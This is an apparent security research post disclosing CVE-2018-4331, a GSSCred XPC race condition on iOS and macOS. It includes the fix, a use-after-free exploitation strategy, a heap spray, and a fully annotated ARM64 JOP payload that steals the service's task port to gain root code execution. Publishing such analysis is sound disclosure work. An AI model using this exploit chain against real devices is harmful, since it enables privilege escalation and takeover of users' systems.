An introduction to exploiting userspace race conditions on iOS

Let’s walk through the discovery and exploitation of CVE-2018-4331, a race condition in the com.apple.GSSCred XPC service that could be used to execute arbitrary code inside the GSSCred process, which runs as root on macOS and iOS. The exploit, gsscred-race, targets iOS 11.2, although versions up through iOS 11.4.1 are vulnerable. This post will show how I discovered the bug, how I analyzed its exploitability, and how I developed a JOP program that allowed me to take control of the process.

The vulnerability: CVE-2018-4331

I started looking at GSSCred after noticing that it ran as root and also provided an XPC service, com.apple.GSSCred, reachable from within the iOS container sandbox. A quick Google search confirmed that the source code was available online: GSSCred is part of Apple’s Heimdal project.

Looking at the source, the GSSCred service first creates a serial dispatch queue and initializes the XPC connection listener to run on that queue:

runQueue = dispatch_queue_create("com.apple.GSSCred", DISPATCH_QUEUE_SERIAL);
heim_assert(runQueue != NULL, "dispatch_queue_create failed");

conn = xpc_connection_create_mach_service("com.apple.GSSCred",
                                          runQueue,
                                          XPC_CONNECTION_MACH_SERVICE_LISTENER);

xpc_connection_set_event_handler(conn, ^(xpc_object_t object) {
	GSSCred_event_handler(object);
});

The XPC runtime will dispatch a call to GSSCred_event_handler() each time an event is received on the listener connection. In particular, when a client creates a connection to com.apple.GSSCred and sends the first XPC message, GSSCred_event_handler() will be invoked with the server-side XPC connection object.

Using a serial dispatch queue is important because GSSCred does not use locking to protect against parallel data accesses from multiple clients. Instead, GSSCred relies on the serial processing of XPC events to protect against race conditions.

The GSSCred_event_handler() function is responsible for initializing an incoming client connection. It creates a server-side peer object to represent the connection context and sets the event handler that the XPC runtime will call when an event (such as a message from the client) is received on the connection:

static void GSSCred_event_handler(xpc_connection_t peerconn)
{
	struct peer *peer;

	peer = malloc(sizeof(*peer));
	heim_assert(peer != NULL, "out of memory");

	peer->peer = peerconn;
	peer->bundleID = CopySigningIdentitier(peerconn);
	if (peer->bundleID == NULL) {
		...
	}
	peer->session = HeimCredCopySession(xpc_connection_get_asid(peerconn));
	heim_assert(peer->session != NULL, "out of memory");

	xpc_connection_set_context(peerconn, peer);
	xpc_connection_set_finalizer_f(peerconn, peer_final);

	xpc_connection_set_event_handler(peerconn, ^(xpc_object_t event) {
		GSSCred_peer_event_handler(peer, event);
	});
	xpc_connection_resume(peerconn);
}

When I saw this code, I noticed that the typical call to xpc_connection_set_target_queue() was missing: in code like this, you’d usually see the target dispatch queue for the new connection to the client (peerconn in the code) explicitly being set to the same queue on which the listener runs (runQueue). It wasn’t immediately obvious whether this was problematic, so I decided to check the documentation.

Here’s what xpc/connection.h has to say about xpc_connection_set_event_handler():

Connections received by listeners are equivalent to those returned by
xpc_connection_create() with a non-NULL name argument and a NULL targetq
argument with the exception that you do not hold a reference on them.
You must set an event handler and activate the connection.

And here’s the documentation from xpc_connection_create() about the targetq parameter:

@param targetq
The GCD queue to which the event handler block will be submitted. This
parameter may be NULL, in which case the connection's target queue will be
libdispatch's default target queue, defined as DISPATCH_TARGET_QUEUE_DEFAULT.
The target queue may be changed later with a call to
xpc_connection_set_target_queue().

This means we do have a problem: peerconn’s target queue will be to libdispatch’s default target queue, DISPATCH_TARGET_QUEUE_DEFAULT, which is a concurrent queue. Even though connections to GSSCred will be received serially, requests from different clients may be executed concurrently.

Put another way, setting the target queue only on the listener connection is not sufficient: client connections will be received serially in GSSCred_event_handler(), but GSSCred_peer_event_handler() could run in parallel for different clients.

The XPC documentation about concurrent execution of event handlers in different clients may be misleading at first glance. The documentation for xpc_connection_set_target_queue() states:

The XPC runtime guarantees this non-preemptiveness even for concurrent target
queues. If the target queue is a concurrent queue, then XPC still guarantees
that there will never be more than one invocation of the connection's event
handler block executing concurrently. If you wish to process events
concurrently, you can dispatch_async(3) to a concurrent queue from within
the event handler.

It’s important to understand that this guarantee is strictly per-connection: event handler blocks for different connections, even if they share the same underlying code, are considered different event handler blocks and are allowed to run concurrently.

The fix for this issue in GSSCred is to insert a call to xpc_connection_set_target_queue() before activating the client connection with xpc_connection_resume() to set the target queue for the client connection to the serial queue created earlier. For example:

xpc_connection_set_event_handler(peerconn, ^(xpc_object_t event) {
	GSSCred_peer_event_handler(peer, event);
});
xpc_connection_set_target_queue(peerconn, runQueue);		// added
xpc_connection_resume(peerconn);

This will guarantee that all client requests across all connections will be handled serially.

Analyzing the race

The vulnerability is that multiple clients can connect to GSSCred and cause GSSCred_peer_event_handler() to execute in parallel on different threads. Thus, in order to exploit the vulnerability, we want to look for race conditions in GSSCred_peer_event_handler().

Fortunately, and unfortunately, there are a lot of them. Because GSSCred was written under the assumption that it would execute serially, any access to shared data is a potential race.

GSSCred_peer_event_handler() reads the "command" property from the XPC message and dispatches to the corresponding implementation:

Command	Function
`"wakeup"`
`"create"`	`do_CreateCred()`
`"delete"`	`do_Delete()`
`"setattributes"`	`do_SetAttrs()`
`"fetch"`	`do_Fetch()`
`"move"`	`do_Move()`
`"query"`	`do_Query()`
`"default"`	`do_GetDefault()`
`"retain-transient"`
`"release-transient"`
`"status"`	`do_Status()`

When searching for race conditions, you usually want at least one of two properties: either the race should be easy to win, or the race should be safe to lose. In the first case, you want a high probability of winning the race and achieving the desired outcome. In the second case, you want to be able to retry the race over and over again until you get it right, and not have to worry about getting it wrong.

Looking at the functions above, most of the shared data accesses are to the peer object, which represents the server-side state of the client. There are no obvious candidates for data races that are safe: every race I could find relied on reallocating memory with controlled data, which is racy and prone to causing crashes.

However, several of the functions do process controlled data in a loop, which gives us a way to prolong their execution. For example, do_CreateCred() and do_SetAttrs() will convert a controlled XPC dictionary into a CoreFoundation dictionary, do_Delete() will remove an arbitrary number of credential objects, do_Query() will search through all available credentials, etc. By increasing the number of items on which these functions operate, we can delay certain parts of their execution. Hopefully this delay occurs inside a useful race window, giving us more time to win the race.

After much experimentation to determine the candidate race most likely to succeed, I eventually settled on calling do_SetAttrs() with a large attributes dictionary on a credential in thread 1, while invoking do_Delete() to delete the credential in thread 2, causing a use-after-free in thread 1 after it finishes processing the attributes dictionary.

Creating a use-after-free

The do_SetAttrs() function handles the "setattributes" command from the client. Here is the code (edited for presentation):

static void
do_SetAttrs(struct peer *peer, xpc_object_t request, xpc_object_t reply)
{
	CFUUIDRef uuid = HeimCredCopyUUID(request, "uuid");
	CFMutableDictionaryRef attrs;
	CFErrorRef error = NULL;

	if (uuid == NULL)
		return;

	if (!checkACLInCredentialChain(peer, uuid, NULL)) {
		CFRelease(uuid);
		return;
	}

	HeimCredRef cred = (HeimCredRef)CFDictionaryGetValue(	// (a) The credential
			peer->session->items, uuid);		//     pointer is copied to
	CFRelease(uuid);					//     a local variable.
	if (cred == NULL)
		return;

	heim_assert(CFGetTypeID(cred) == HeimCredGetTypeID(),
			"cred wrong type");

	if (cred->attributes) {
		attrs = CFDictionaryCreateMutableCopy(NULL, 0,
				cred->attributes);
		if (attrs == NULL)
			return;
	} else {
		attrs = CFDictionaryCreateMutable(NULL, 0,
				&kCFTypeDictionaryKeyCallBacks,
				&kCFTypeDictionaryValueCallBacks);
	}

	CFDictionaryRef replacementAttrs =			// (b) The attributes dict
		HeimCredMessageCopyAttributes(			//     is deserialized from
				request, "attributes",		//     the XPC message.
				CFDictionaryGetTypeID());
	if (replacementAttrs == NULL) {
		CFRelease(attrs);
		goto out;
	}

	CFDictionaryApplyFunction(replacementAttrs,
			updateCred, attrs);
	CFRELEASE_NULL(replacementAttrs);

	if (!validateObject(attrs, &error)) {			// (c) The deserialized
		addErrorToReply(reply, error);			//     attributes dict is
		goto out;					//     validated.
	}

	handleDefaultCredentialUpdate(peer->session,		// (d) The credential
			cred, attrs);				//     pointer from (a) is
								//     used.
	// make sure the current caller is on the ACL list
	addPeerToACL(peer, attrs);

	CFRELEASE_NULL(cred->attributes);
	cred->attributes = attrs;
out:
	CFRELEASE_NULL(error);
}

Since we fully control the contents of the XPC request, we can make (most) deserialization commands take a long time to run, which opens a nice wide race window. Here in do_SetAttrs() the HeimCredMessageCopyAttributes() function performs deserialization, giving us an opportunity to change the program state in another thread during its execution.

To unexpectedly change the program state while do_SetAttrs() is stalled, we will use a separate connection to call the do_Delete() function. This function is responsible for handling a "delete" command from the client. It will delete all credentials matching the deletion query. We can send a "delete" request to free the credential pointer held by do_SetAttrs() while the latter is busy deserializing in HeimCredMessageCopyAttributes().

Using these two functions, the race condition flow goes like this:

Create the HeimCred credential object we will use for the UAF by sending a "create" request.
Send a "setattributes" request for the target credential with an attributes dictionary that will take a long time to deserialize. A pointer to the HeimCred will be saved on the stack (or in a register) while HeimCredMessageCopyAttributes() is deserializing, allocating objects in a tight loop.
While do_SetAttrs() is still in the allocation loop, send a "delete" request on a second connection to delete the target credential. This second connection’s event handler will run on another thread and free the HeimCred. The freed HeimCred object will be added to the heap freelist.
If we’re lucky, back in the first connection’s thread, the freed HeimCred object will be reallocated by HeimCredMessageCopyAttributes() to store deserialized data from the attributes dictionary, giving us control over some of the fields of the freed HeimCred.
Eventually HeimCredMessageCopyAttributes() finishes and do_SetAttrs() resumes, not knowing that the contents of the HeimCred pointer it stored earlier have been changed. It passes the pointer to the corrupted HeimCred to handleDefaultCredentialUpdate() and all hell breaks loose.

Thus, we have used the race condition to create a use-after-free. However, in order for this technique to work, we need to ensure that the freed HeimCred object gets reallocated and overwritten with controlled contents.

Corrupting the HeimCred

Now let’s talk about how exactly we’re going to overwrite the HeimCred object. Here’s the structure definition:

struct HeimCred_s {
	CFRuntimeBase   runtime;	// 00: 0x10 bytes
	CFUUIDRef       uuid;		// 10: 8 bytes
	CFDictionaryRef attributes;	// 18: 8 bytes
	HeimMech *      mech;		// 20: 8 bytes
};					// Total: 0x28 bytes

Since the full structure is 0x28 bytes, it will be allocated from and freed to the 0x30 freelist, which is used for heap objects between 0x20 and 0x30 bytes in size. This means that whatever deserialization is happening in HeimCredMessageCopyAttributes(), we’ll need to ensure that it allocates from the 0x30 freelist in a tight loop, allowing the freed HeimCred to be reused.

However, we can’t pass just anything to HeimCredMessageCopyAttributes(): we also need the deserialized dictionary to pass the call to validateObject() later on. Otherwise, even if we manage to corrupt the HeimCred object, it won’t be used afterwards, rendering our exploit pointless.

It turns out the only way we can both allocate objects in an unbounded loop and pass the validateObject() check is by supplying an attributes dictionary containing an array of strings under the "kHEIMAttrBundleIdentifierACL" key. All other unbounded collections will be rejected by validateObject(). Thus, the only objects we can allocate in a loop are OS_xpc_string, the object type for an XPC string, and CFString, the CoreFoundation string type.

(This isn’t quite true: we could, for example, play tricks with a serialized XPC dictionary with colliding keys such that some objects we allocate don’t end up in the final collection. However, I tried to limit myself to the official XPC API and legal XPC objects. If you remove this restriction, you can probably significantly improve the exploit.)

Fortunately for us, both OS_xpc_string and CFString (for certain string lengths) are also allocated out of the 0x30 freelist. It’s possible to target either data structure for the exploit, but I eventually settled on CFString because it seems easier to win the corresponding race window.

Immutable CFString objects are allocated with their character data inline. This is what the structure looks like for short strings:

struct CFString {
	CFRuntimeBase   runtime;	// 00: 0x10 bytes
	uint8_t         length;		// 10: 1 byte
	char            characters[1];	// 11: variable size
};

Thus, if we use strings between 0x10 and 0x1f bytes long (including the null terminator), the CFString objects will be allocated out of the 0x30 freelist, potentially allowing us to control some fields of the freed HeimCred object.

For the use-after-free to be exploitable we want the part of the CFString that we control to overlap the fields of HeimCred, such that creating the CFString will corrupt the HeimCred object in an interesting way. Looking back to the definition of the HeimCred structure, we can see that the uuid, attributes, and mech fields are all possibly controllable.

However, all three of these fields are pointers, and userspace pointers on iOS usually contain null bytes. Our CFString will end at the first null byte, so in order to remain in the 0x30 freelist the first null byte must occur at or after offset 0x20. This means the uuid and attributes fields will have to be null-free, making them less promising exploit targets (since valid userspace pointers usually contain null bytes). Hence mech is the natural choice. We will try to get the corrupted HeimCred’s mech field to point to memory whose contents we control.

Pointing to controlled data

Where exactly will we make mech point?

We want mech to point to memory we control, but due to ASLR we don’t know any addresses in the GSSCred process. The traditional way to bypass ASLR when we don’t know where our allocations will be placed is using a heap spray. However, this presents two problems. First, performing a traditional heap spray over XPC would be quite slow, since the kernel would need to copy a huge amount of data from our address space into GSSCred’s address space. Second, on iOS the GSSCred process has a strict memory limit of around 6 megabytes, after which it is at risk of being killed by Jetsam. 6 MB is nowhere near enough to perform an effective heap spray, especially since our serialized attributes dictionary will already be allocating thousands of strings to enlarge our race window.

Fortunately for us, libxpc contains an optimization that solves both problems: if we’re sending an XPC data object larger than 0x4000 bytes, libxpc will instead create a Mach memory entry representing the data and send that to the target instead. Then, when the message is deserialized in the recipient, libxpc will map the memory entry directly into the recipient’s address space by calling mach_vm_map(). The result is a fast, copy-free duplication of our memory in the recipient process’s address space. And because the physical pages are shared, they don’t count against GSSCred’s memory limit. (See Ian Beer’s triple_fetch exploit, which is where I learned of this technique and where I derived some of the initial parameters I used in my exploit.)

Since libxpc calls mach_vm_map() with the VM_FLAGS_ANYWHERE flag, the kernel will choose the address of the mapping. Presumably to minimize address space fragmentation, the kernel will typically choose an address close to the program base. The program base is usually located at an address like 0x000000010c65d000: somewhere above but close to 4GB (0x100000000), with the exact address randomized by ASLR. The kernel might then place large VM_ALLOCATE objects at an address like 0x0000000116097000: after the program, but still fairly close to 0x100000000. By comparison, the MALLOC_TINY heap (which is where all of our objects will live) might start at 0x00007fb6f0400000 on macOS and 0x0000000107100000 on iOS.

Using a memory entry heap spray, we can fill a gigabyte or more of GSSCred’s virtual memory space with controlled data. (Choosing the exact parameters was a frustrating exercise in guess-and-check, because for unknown reasons certain configurations of the heap spray work well and others do not.) Because the sprayed data will follow closely behind the program base, there’s a good chance that addresses close to 0x0000000120000000 will contain our sprayed data.

This means we’ll want our corrupted mech field to contain a pointer like 0x0000000120000000. Once again, we need to address problems with null bytes.

Recall that the mech field is actually part of a CFString object that overwrites the freed HeimCred pointer. Thus, the first null byte will terminate the string and all bytes after that will retain whatever value they originally had in the HeimCred object.

Fortunately, because current macOS and iOS platforms are all little-endian, the pointer is laid out least significant byte to most significant byte. If instead we use an address like 0x0000000120202020 (with all the null bytes at the start) for our controlled data, then the lower 5 bytes of the address will be copied into the mech field, and the null terminator will zero out the 6th. This leaves just the 2 high bytes of the mech field with whatever value they had originally.

However, we know that the mech field was originally a heap pointer into the MALLOC_TINY heap, and MALLOC_TINY pointers on both macOS and iOS start with 2 zero bytes. Thus, even though we can only write to the lower 6 bytes, we know that the upper 2 bytes will always have the value we want.

This means we have a way to get controlled data at a known address in the GSSCred process and can make the mech field point to that data. Getting control of PC is simply a matter of choosing the right data.

Controlling PC

We fully control the data pointed to by the mech field, so we can construct a fake HeimMech object. Here’s the HeimMech structure:

struct HeimMech {
	CFRuntimeBase           runtime;		// 00: 0x10 bytes
	CFStringRef             name;			// 10: 8 bytes
	HeimCredStatusCallback  statusCallback;		// 18: 8 bytes
	HeimCredAuthCallback    authCallback;		// 20: 8 bytes
};

All of these fields are attractive targets. Controlling the isa pointer of an Objective-C object allows us to gain code execution if an Objective-C message is sent to the object (see Phrack, Modern Objective-C Exploitation Techniques). And the last 2 fields are pointers to callback functions, which is an even easier route to PC control (if we can get them called).

To determine which field or fields are of interest, we need to look at how the corrupted HeimCred is used. The first time it is used after the call to HeimCredMessageCopyAttributes() is when it is passed as a parameter to handleDefaultCredentialUpdate().

Here’s the source code of handleDefaultCredentialUpdate(), with some irrelevant code removed:

static void
handleDefaultCredentialUpdate(struct HeimSession *session,
		HeimCredRef cred, CFDictionaryRef attrs)
{
	heim_assert(cred->mech != NULL, "mech is NULL, "	// (e) mech must not be
			"schame validation doesn't work ?");	//     NULL.

	CFUUIDRef oldDefault = CFDictionaryGetValue(		// (f) Corrupted name
			session->defaultCredentials,		//     pointer passed to
			cred->mech->name);			//     CF function.

	CFBooleanRef defaultCredential = CFDictionaryGetValue(
			attrs, kHEIMAttrDefaultCredential);
	...

	CFDictionarySetValue(session->defaultCredentials,
			cred->mech->name, cred->uuid);

	notifyChangedCaches();
}

Since we will make the corrupted HeimCred’s mech field point to our heap spray data, it will never be NULL, so the assertion will pass. Next, the mech field will be dereferenced to read the name pointer, which is passed to CFDictionaryGetValue(). This is perfect: we can make our fake HeimMech’s name pointer also point into the heap spray data. We will construct a fake Objective-C object such that when CFDictionaryGetValue() sends a message to it we end up with PC control.

As it turns out, CFDictionaryGetValue() will send an Objective-C message with the hash selector to its second argument. We can construct our fake name object so that its isa pointer indicates that it responds to the hash selector with an Objective-C method whose implementation pointer contains the PC value we want. For more complete details, refer to the Phrack article.

So, in summary, we can corrupt the HeimCred object such that its mech pointer points to a fake HeimMech object, and the HeimMech’s name field points to a fake Objective-C object whose contents we fully control. The name pointer will be passed to CFDictionaryGetValue(), which will invoke objc_msgSend() on the name pointer for the hash selector. The name object’s isa pointer will point to an objc_class object that indicates that name responds to the hash selector with a particular method implementation. When objc_msgSend() invokes that method, we get PC control, with the name pointer as the first argument.

Getting GSSCred’s task port

Controlling PC alone is not enough. We also need to construct a payload to execute in the context of the GSSCred process that will accomplish useful work. In our case, we will try to make GSSCred give us a send right to its task port, allowing us to manipulate the process without having to re-exploit the race condition each time. Here we will describe the ARM64 payload.

When we get PC control, the X0 register will point to the fake name object. The name object’s isa pointer is already determined by the part of the payload that gets PC control, but everything after the first 8 bytes can be used by the ARM64 payload. We can write our exploit payload as a jump-oriented program.

Borrowing a technique from triple_fetch, I wanted to have the exploit payload send a Mach message containing GSSCred’s task port from GSSCred back to our process. The challenge is that we don’t know what port to send this message to, such that we can receive the message back in our process. We could create a Mach port in our process to which we have the receive right, then send the corresponding send right over to GSSCred, but we don’t know what port name the kernel will assign that send right over in GSSCred.

The triple_fetch exploit gets around this limitation by sending a message with thousands of Mach send rights, spraying the target’s Mach port namespace so that with high probability one of the hardcoded Mach port names used in the payload will be a send right back to the exploiting process.

I decided to try the inverse: send a single Mach send right to GSSCred, then have the exploit payload try to send the Mach message to thousands of different Mach port names, hopefully hitting the one corresponding to the send right back to our process. One prominent advantage of this design is that it can take up significantly less space (we no longer need a massive Mach port spray, and the ARM64-specific part of the payload could easily be packed down to 400 bytes).

The other strategy I was contemplating was to try and deduce the Mach send right name directly, either by working backwards from the current register values or stack contents or by scanning memory. However, this seemed more complicated and more fragile than simply spraying Mach messages to every possible port name.

Once GSSCred sends all the Mach messages, we need to finish in a way that doesn’t cause GSSCred to crash. Since it seemed difficult to repair the corruption and resume executing from where we hijacked control, the exploit payload simply enters an infinite loop. This means that GSSCred will never reply to the “setattributes” request that caused the exploit payload to be executed.

Back in our process, we can listen on the receiving end of the Mach port we sent to GSSCred for a message. If a message is received, that means we won the race and the exploit succeeded.

Here’s the JOP payload I used:

ENTRY:
	REGION_ARG1 = {
		 0 : ISA (generic payload)
		20 : _longjmp
		28 : REGION_JMPBUF
	}
	REGION_JMPBUF = {
		 0 : x19 = REGION_X19
		 8 : x20 = INITIAL_REMOTE_AND_LOCAL_PORT
		10 : x21 = PORT_INCREMENT
		18 : x22 = JOP_STACK_FINALIZE
		20 : x23 = mach_msg_send
		28 : x24 = JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP
		30 : x25 = LDP_X8_X2_X19__BLR_X8
		38 : x26 = MAX_REMOTE_AND_LOCAL_PORT
		40 : x27 = REGION_MACH_MESSAGE
		58 : x30 = LDP_X8_X2_X19__BLR_X8
		68 : sp = FAKE_STACK_ADDRESS
	}
	REGION_X19 = {
		 0 : LDP_X3_X2_X2__BR_X3
		 8 : JOP_STACK_INCREMENT_PORT_AND_BRANCH
		10 : BLR_X8
		78 = REGION_MACH_MESSAGE
		80 : REGION_MACH_MESSAGE[8]
	}
	REGION_MACH_MESSAGE = {
		 0 : msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_COPY_SEND, 0, 0);
		 4 : msgh_size = sizeof(mach_msg_header_t) = 0x18
		 8 : msgh_remote_port
		 c : msgh_local_port
		10 : msgh_voucher_port = 0
		14 : msgh_id = GSSCRED_RACE_MACH_MESSAGE_ID
	}
	JOP_STACK_INCREMENT_PORT_AND_BRANCH = [
		ADD_X1_X21_X20__BLR_X8
		MOV_X20_X1_BLR_X8
		STR_X1_X19_80__BLR_X8
		MOV_X0_X26__BLR_X8
		SUB_X1_X1_X0__BLR_X8
		MOV_X13_X1__BR_X8
		MOV_X9_X13__BR_X8
		MOV_X11_X24__BR_X8
		CMP_X9_0__CSEL_X1_X10_X9_EQ__BLR_X8
		MOV_X9_X22__BR_X8
		CSEL_X2_X11_X9_LT__BLR_X8
	]
	JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP = [
		MOV_X0_X27__BLR_X8
		BLR_X23__MOV_X0_X21__BLR_X25
	]
	JOP_STACK_FINALIZE = [
		LDR_X8_X19_10__BLR_X8
	]
	x0 = REGION_ARG1
	pc = LDP_X1_X0_X0_20__BR_X1

;; We get control of PC with X0 pointing to a fake "name" Objective-C object.
;; The isa pointer is managed by the generic part of the payload, but
;; everything after that is usable for the arm64 payload.
;;
;; Before entering the main loop, we need to set registers x19 through x27. We
;; could try to preserve the callee-saved registers and x29, x30, and sp so
;; that our caller could resume after the exploit payload runs, but it's easier
;; to just obliterate these registers and permanently stall this thread so that
;; the corruption never manifests a crash. Unfortunately, this also means we
;; leak all associated resources, so we have only one shot before we risk
;; violating the Jetsam limit.
;;
;; We need to set the following register values:
;; 	x19 = REGION_X19
;; 	x20 = INITIAL_REMOTE_AND_LOCAL_PORT
;; 	x21 = PORT_INCREMENT
;; 	x22 = JOP_STACK_FINALIZE
;; 	x23 = mach_msg_send
;; 	x24 = JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP
;; 	x25 = LDP_X8_X2_X19__BLR_X8
;; 	x26 = MAX_REMOTE_AND_LOCAL_PORT
;; 	x27 = REGION_MACH_MESSAGE

LDP_X1_X0_X0_20__BR_X1 (common):
		ldp x1, x0, [x0, #0x20]
		br x1
	x1 = REGION_ARG1[20] = _longjmp
	x0 = REGION_ARG1[28] = REGION_JMPBUF

_longjmp:
	x19 = REGION_X19
	x20 = INITIAL_REMOTE_AND_LOCAL_PORT
 	x21 = PORT_INCREMENT
 	x22 = JOP_STACK_FINALIZE
 	x23 = mach_msg_send
 	x24 = JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP
 	x25 = LDP_X8_X2_X19__BLR_X8
 	x26 = MAX_REMOTE_AND_LOCAL_PORT
 	x27 = REGION_MACH_MESSAGE
	x30 = LDP_X8_X2_X19__BLR_X8
	sp = FAKE_STACK_ADDRESS
	pc = LDP_X8_X2_X19__BLR_X8

;; We are about to enter the main loop, which will repeatedly send Mach
;; messages containing the the current process's task port to incrementing
;; remote port numbers.
;;
;; These are the registers during execution:
;; 	x2 = Current JOP stack position
;; 	x3 = Current gadget
;; 	x8 = LDP_X3_X2_X2__BR_X3
;; 	x20 = CURRENT_REMOTE_AND_LOCAL_PORT

LDP_X8_X2_X19__BLR_X8 (CoreUtils):
		ldp x8, x2, [x19]
		blr x8
	x8 = REGION_X19[0] = LDP_X3_X2_X2__BR_X3
	x2 = REGION_X19[8] = JOP_STACK_INCREMENT_PORT_AND_BRANCH
	pc = LDP_X3_X2_X2__BR_X3

;; This is our dispatch gadget. It reads gadgets to execute from a "linked
;; list" JOP stack.

LDP_X3_X2_X2__BR_X3 (CoreFoundation, Heimdal):
		ldp x3, x2, [x2]
		br x3
	x3 = ADD_X1_X21_X20__BLR_X8
	pc = ADD_X1_X21_X20__BLR_X8

;; The first JOP stack we execute is JOP_STACK_INCREMENT_PORT_AND_BRANCH. We
;; increment the remote Mach port via a register containing the combined remote
;; and local port numbers, test if the remote Mach port is above the limit, and
;; branch to either send the message and loop again or finish running the
;; exploit payload.

ADD_X1_X21_X20__BLR_X8 (libxml2):
		add x1, x21, x20
		blr x8
	x1 = CURRENT_REMOTE_AND_LOCAL_PORT + PORT_INCREMENT = NEXT_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = MOV_X20_X1_BLR_X8

MOV_X20_X1_BLR_X8 (libswiftCore, MediaPlayer):
		mov x20, x1
		blr x8
	x20 = NEXT_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = STR_X1_X19_80__BLR_X8

STR_X1_X19_80__BLR_X8 (libswiftCore):
		str x1, [x19, #0x80]
		blr x8
	REGION_X19[80] = REGION_MACH_MESSAGE[8] = NEXT_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = MOV_X0_X26__BLR_X8

MOV_X0_X26__BLR_X8 (common):
		mov x0, x26
		blr x8
	x0 = MAX_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = SUB_X1_X1_X0__BLR_X8

SUB_X1_X1_X0__BLR_X8 (libswiftCore):
		sub x1, x1, x0
		blr x8
	x1 = NEXT_REMOTE_AND_LOCAL_PORT - MAX_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = MOV_X13_X1__BR_X8

MOV_X13_X1__BR_X8 (CloudKitDaemon, MediaToolbox):
		mov x13, x1
		br x8
	x13 = NEXT_REMOTE_AND_LOCAL_PORT - MAX_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = MOV_X9_X13__BR_X8

MOV_X9_X13__BR_X8 (AirPlaySender, SafariShared):
		mov x9, x13
		br x8
	x9 = NEXT_REMOTE_AND_LOCAL_PORT - MAX_REMOTE_AND_LOCAL_PORT
	pc = LDP_X3_X2_X2__BR_X3
	pc = MOV_X11_X24__BR_X8

MOV_X11_X24__BR_X8 (AirPlayReceiver, CloudKitDaemon):
		mov x11, x24
		br x8
	x11 = JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP
	pc = LDP_X3_X2_X2__BR_X3
	pc = CMP_X9_0__CSEL_X1_X10_X9_EQ__BLR_X8

;; Compare x9 (NEXT_REMOTE_AND_LOCAL_PORT - MAX_REMOTE_AND_LOCAL_PORT) to 0. If
;; x9 is less than 0, then NEXT_REMOTE_AND_LOCAL_PORT is less than
;; MAX_REMOTE_AND_LOCAL_PORT, and so we should send the message and loop again.
;; Otherwise, we should exit the loop.

CMP_X9_0__CSEL_X1_X10_X9_EQ__BLR_X8 (TextInputCore):
		cmp x9, #0
		csel x1, x10, x9, eq
		blr x8
	nzcv = CMP(NEXT_REMOTE_AND_LOCAL_PORT - MAX_REMOTE_AND_LOCAL_PORT, 0)
	x1 = CLOBBER
	pc = LDP_X3_X2_X2__BR_X3
	pc = MOV_X9_X22__BR_X8

MOV_X9_X22__BR_X8 (MediaToolbox, StoreServices):
		mov x9, x22
		br x8
	x9 = JOP_STACK_FINALIZE
	pc = LDP_X3_X2_X2__BR_X3
	pc = CSEL_X2_X11_X9_LT__BLR_X8

CSEL_X2_X11_X9_LT__BLR_X8 (AppleCVA, libLLVM):
		csel x2, x11, x9, lt
		blr x8
	if (NEXT_REMOTE_AND_LOCAL_PORT < MAX_REMOTE_AND_LOCAL_PORT)
		x2 = JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP
	else
		x2 = JOP_STACK_FINALIZE
	pc = LDP_X3_X2_X2__BR_X3
	if (NEXT_REMOTE_AND_LOCAL_PORT < MAX_REMOTE_AND_LOCAL_PORT)
		pc = JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP[0]
	else
		pc = JOP_STACK_FINALIZE[0]

;; If the conditional is true, we execute from
;; JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP. This JOP stack sends the Mach message
;; and then runs the JOP_STACK_INCREMENT_PORT_AND_BRANCH stack again.

MOV_X0_X27__BLR_X8 (common):
		mov x0, x27
		blr x8
	x0 = REGION_MACH_MESSAGE
	pc = LDP_X3_X2_X2__BR_X3
	pc = BLR_X23__MOV_X0_X21__BLR_X25

BLR_X23__MOV_X0_X21__BLR_X25 (MediaToolbox):
		blr x23
		mov x0, x21
		blr x25
	pc = mach_msg_send
	x0 = PORT_INCREMENT
	pc = LDP_X8_X2_X19__BLR_X8

;; If the conditional is false, we execute from JOP_STACK_FINALIZE. This JOP
;; stack is responsible for ending execution of the exploit payload in a way
;; that leaves the GSSCred process running.
;;
;; Ideally we'd do one of two things:
;; 	- Return to the caller in a consistent state. The caller would then
;; 	  continue running as usual and release associated resources.
;; 	- Cancel or suspend the current thread. This prevents further
;; 	  corruption and resource consumption, but leaks currently consumed
;; 	  resources.
;;
;; Unfortunately fixing the corruption seems difficult at best and
;; pthread_exit() aborts in the current context. The only remaining good option
;; is a live wait. For simplicity we simply enter an infinite loop.

LDR_X8_X19_10__BLR_X8 (common):
		ldr x8, [x19, #0x10]
		blr x8
	x8 = BLR_X8
	pc = BLR_X8

BLR_X8 (common):
		blr x8
	pc = BLR_X8

We can lay this program out memory as follows:

     0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f
    +----------------------------------------------------------------+
  0 |AACCCCCCAAAA    KKKKKKKKLLLL    DDDDDDBBBBBBBBBBBBBBBBBB    BB  |
100 |BB      JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ            |
    +----------------------------------------------------------------+
     0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f

    A  =  REGION_ARG1                           =  0 - 30  @   0
    B  =  REGION_JMPBUF                         =  0 - 70  @  98
    C  =  REGION_X19                            =  0 - 18  @   8
    D  =  REGION_MACH_MESSAGE                   =  0 - 18  @  78 + REGION_X19

    J  =  JOP_STACK_INCREMENT_PORT_AND_BRANCH   =  0 - b0  @ 120
    K  =  JOP_STACK_SEND_MACH_MESSAGE_AND_LOOP  =  0 - 20  @  40
    L  =  JOP_STACK_FINALIZE                    =  0 - 10  @  60

Conclusion

On macOS, GSSCred runs outside of any sandbox, meaning once we get the task port we have unsandboxed arbitrary code execution as root.

